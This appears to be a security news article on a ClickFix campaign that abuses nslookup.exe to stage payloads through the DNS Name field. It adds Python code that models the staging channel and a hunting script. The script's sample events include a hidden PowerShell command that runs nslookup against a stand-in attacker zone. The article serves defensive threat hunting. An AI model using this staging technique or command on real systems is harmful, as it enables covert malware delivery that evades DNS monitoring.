Social engineering campaigns are becoming increasingly sophisticated, moving beyond simple phishing emails to more complex technical deceptions.
The “ClickFix” tactic, which typically tricks users into copying and pasting malicious scripts to “fix” a fake browser error, has undergone significant evolution.
Security researcher Muhammad Hassoub has observed attackers moving away from high-noise tools that trigger immediate alerts.
Instead, they are now abusing nslookup.exe, the legitimate Windows command-line tool for querying the Domain Name System (DNS), to stage payloads and deliver malware.
This variation lets threat actors stay under the radar: the requests it generates look like ordinary DNS lookups, and the process making them is a signed, built-in Microsoft binary.
In earlier iterations, the pasted command often contained recognisable PowerShell strings that security tooling could flag outright.
The current campaign instead has nslookup.exe fetch the malicious data over DNS.
The key change is where the data lives: it is carried in the “Name” field of the DNS response, which nslookup prints on its Name: line, rather than in TXT records, the channel that DNS-tunnelling detections most commonly watch.
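As an added illustration, not code from the researcher or from the campaign, the following Python models how data can reach a script through nslookup's Name: line and why a monitor that only inspects TXT records sees nothing. It assumes a hypothetical attacker zone stage.example, base32-encoded data split across DNS labels, and an answer layout (a CNAME whose target carries the data, so that target appears on the Name: line) that the article does not specify; both nslookup outputs are constructed, not captured.

```python
import base64
import re
from typing import List, Optional

ZONE = "stage.example"          # hypothetical attacker-controlled zone
PAYLOAD = b"stage-ok"           # stand-in for the staged data


def to_dns_labels(data: bytes, label_len: int = 63) -> str:
    """Encode bytes as base32 (letters and digits only, so valid in a hostname),
    split into labels of at most 63 octets, and append the zone.
    Base32 padding is dropped because '=' is not legal in a label."""
    enc = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [enc[i:i + label_len] for i in range(0, len(enc), label_len)]
    return ".".join(labels + [ZONE])


def from_dns_name(name: str) -> bytes:
    """Reverse of to_dns_labels: strip the zone, join the labels, restore padding."""
    host = name.lower().rstrip(".")
    if not host.endswith("." + ZONE):
        raise ValueError("not in staging zone")
    enc = host[: -len(ZONE) - 1].replace(".", "").upper()
    enc += "=" * (-len(enc) % 8)
    return base64.b32decode(enc)


STAGED_NAME = to_dns_labels(PAYLOAD)
TXT_VALUE = base64.b32encode(PAYLOAD).decode()

# Constructed nslookup.exe output for a lookup of q.stage.example whose CNAME
# target is the data-bearing name; nslookup prints that target on "Name:".
OUTPUT_NAME_CHANNEL = f"""Server:  UnKnown
Address:  192.0.2.53

Non-authoritative answer:
Name:    {STAGED_NAME}
Address:  192.0.2.10
Aliases:  q.stage.example
"""

# Constructed output for the TXT-record variant of the same staging step.
OUTPUT_TXT_CHANNEL = f"""Server:  UnKnown
Address:  192.0.2.53

Non-authoritative answer:
q.stage.example\ttext =

\t"{TXT_VALUE}"
"""


def txt_records(output: str) -> List[str]:
    """What a TXT-only tunnelling monitor sees: quoted strings under 'text ='."""
    return re.findall(r'^\s*"([^"]*)"\s*$', output, re.M)


def name_field(output: str) -> Optional[str]:
    """The host printed on nslookup's Name: line, if any."""
    m = re.search(r"^Name:\s+(\S+)", output, re.M)
    return m.group(1) if m else None


def stage_from_output(output: str) -> Optional[bytes]:
    """Recover staged data the way a pasted script would: from the Name: line."""
    name = name_field(output)
    return from_dns_name(name) if name else None


if __name__ == "__main__":
    print("TXT monitor sees in Name-channel output:", txt_records(OUTPUT_NAME_CHANNEL))
    print("Name-channel data:", stage_from_output(OUTPUT_NAME_CHANNEL))
```

The TXT extractor returns an empty list for the Name-channel output, which is the blind spot the article describes: the data is in the answer's owner name, not in a record type most tunnelling rules inspect.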
Detection and Threat Hunting
The shift toward legitimate system binaries, known as Living off the Land binaries (LOLBins), makes detection hard for signature-based controls.
Because nslookup.exe is a built-in tool, the process creation looks like a routine administrative DNS lookup.
Security teams that only alert on known-bad PowerShell strings, or on DNS tunnelling through TXT records, are likely to miss this infection vector entirely.
To assist defenders in identifying this subtle activity, security researcher Muhammad Hassoub has released specific threat-hunting resources.
He has published two CrowdStrike Query Language (CQL) hunting leads designed to catch this behavior in enterprise environments.
These queries help security operations centers (SOCs) filter through normal DNS traffic to identify the anomalous use of nslookup.exe associated with this ClickFix campaign.
Security teams are advised to review their detection logic and incorporate these new indicators to prevent successful payload staging.
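The hunting logic below is an added example written for this page in Python; it is not one of Hassoub's CQL queries and runs over constructed Sysmon-style process-creation events rather than real telemetry. It scores three indicators that together describe the ClickFix-plus-nslookup chain: a shell launched from explorer.exe (what a Run-dialog paste produces), an ancestor command line that consumes nslookup's output, and a query name whose labels look like encoded data. The field names, thresholds and the stage.example zone are assumptions.

```python
import math
import re
from collections import Counter
from typing import Dict, List

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
MIN_LABEL_LEN = 16        # encoded data needs room; real host labels are rarely this long
MIN_LABEL_ENTROPY = 3.5   # bits per character, chosen by hand for this example

# Constructed events (Sysmon-style fields plus a grandparent field, as some EDR
# telemetry carries). Not real campaign telemetry; the zone is hypothetical.
SAMPLE_EVENTS = [
    {   # ClickFix-shaped: Run dialog (explorer.exe) -> hidden PowerShell -> nslookup,
        # parent consumes the output, query name is full of encoded data
        "EventId": "evt-1",
        "Image": r"C:\Windows\System32\nslookup.exe",
        "CommandLine": "nslookup on2gcz3ffvxwwmn2gc4tfmqqhezlf.stage.example",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentCommandLine": r'''powershell -w hidden -c "$r = nslookup on2gcz3ffvxwwmn2gc4tfmqqhezlf.stage.example | Select-String 'Name:'"''',
        "GrandparentImage": r"C:\Windows\explorer.exe",
    },
    {   # Administrator typing a lookup into an interactive cmd window
        "EventId": "evt-2",
        "Image": r"C:\Windows\System32\nslookup.exe",
        "CommandLine": "nslookup dc01.corp.example",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'"C:\Windows\system32\cmd.exe"',
        "GrandparentImage": r"C:\Windows\explorer.exe",
    },
    {   # Scheduled monitoring script that records nslookup output
        "EventId": "evt-3",
        "Image": r"C:\Windows\System32\nslookup.exe",
        "CommandLine": "nslookup -type=a mail.corp.example 10.0.0.53",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentCommandLine": r'powershell -c "nslookup -type=a mail.corp.example 10.0.0.53 | Out-File C:\ops\dns.log"',
        "GrandparentImage": r"C:\Windows\System32\svchost.exe",
    },
]

# Output being captured: a pipe, a cmd 'for /f' loop, or assignment/subexpression.
PARSES_OUTPUT = re.compile(r"\||for\s+/f|\$\(|=\s*nslookup", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def query_name(cmdline: str) -> str:
    """First non-option argument of an nslookup command line; '' in interactive mode."""
    args = [t for t in cmdline.split()[1:] if not t.startswith("-")]
    return args[0].strip('"').lower() if args else ""


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def data_bearing_labels(name: str) -> List[str]:
    """Labels long and random-looking enough to be carrying encoded data."""
    return [label for label in name.split(".")
            if len(label) >= MIN_LABEL_LEN and shannon_entropy(label) >= MIN_LABEL_ENTROPY]


def indicators(ev: dict) -> List[str]:
    found = []
    # Run-dialog paste: explorer.exe spawns the shell that spawns nslookup. A cmd
    # 'for /f' adds one more cmd.exe in between; widen the ancestry check for that.
    if basename(ev["ParentImage"]) in SHELLS and basename(ev.get("GrandparentImage", "")) == "explorer.exe":
        found.append("run_dialog_chain")
    ancestors = (ev.get("ParentCommandLine", ""), ev.get("GrandparentCommandLine", ""))
    if any("nslookup" in cl.lower() and PARSES_OUTPUT.search(cl) for cl in ancestors):
        found.append("output_parsed")
    if data_bearing_labels(query_name(ev["CommandLine"])):
        found.append("data_bearing_query")
    return found


def hunt(events) -> Dict[str, List[str]]:
    """Indicators per nslookup.exe event; other processes are ignored."""
    return {ev["EventId"]: indicators(ev) for ev in events if basename(ev["Image"]) == "nslookup.exe"}


def flagged(events, threshold: int = 2) -> List[str]:
    """Event IDs with at least `threshold` indicators; one alone is routine admin noise."""
    return [eid for eid, inds in hunt(events).items() if len(inds) >= threshold]


if __name__ == "__main__":
    for eid, inds in hunt(SAMPLE_EVENTS).items():
        print(eid, inds)
    print("flagged:", flagged(SAMPLE_EVENTS))
```

Each indicator on its own is common in a healthy estate (admins run nslookup from explorer-spawned shells; monitoring scripts capture its output), which is why the score requires two of the three; the query-name check is what ties the lookup to staged data regardless of whether it arrives in a TXT record or in the answer's name.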